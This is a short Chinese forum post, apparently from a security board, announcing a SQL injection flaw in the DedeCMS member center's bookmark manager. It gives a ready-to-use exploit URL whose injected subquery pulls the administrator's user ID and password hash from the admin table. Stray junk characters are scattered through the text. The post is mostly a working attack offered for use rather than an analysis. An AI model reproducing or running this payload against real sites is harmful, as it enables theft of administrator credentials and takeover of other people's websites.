DedeCMS会员中心SQL注射漏洞
$ H/ W: @. u. f需要magic_quotes_gpc = Off, U& y8 v7 y& V, b
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
, R1 A3 B( ]+ m0 X/ R
% K, v/ ~4 f2 C J3 dDedeCMS会员中心书签管理SQL注射漏洞$ D F3 I$ R8 D0 V3 x7 r5 F7 Z
成功利用该漏洞可获得管理员密码, b+ e/ V& z0 l O7 u( d# x0 x3 k
" r( p9 v' \/ V! a5 M会员登录后可以执行SQL语句查询数据库任意内容如管理员密码) x8 w& c/ y1 @, q; N
. ^9 g# _2 |7 ?
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
4 h, X6 V! p9 d, U7 s( r2 T- j9 d |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59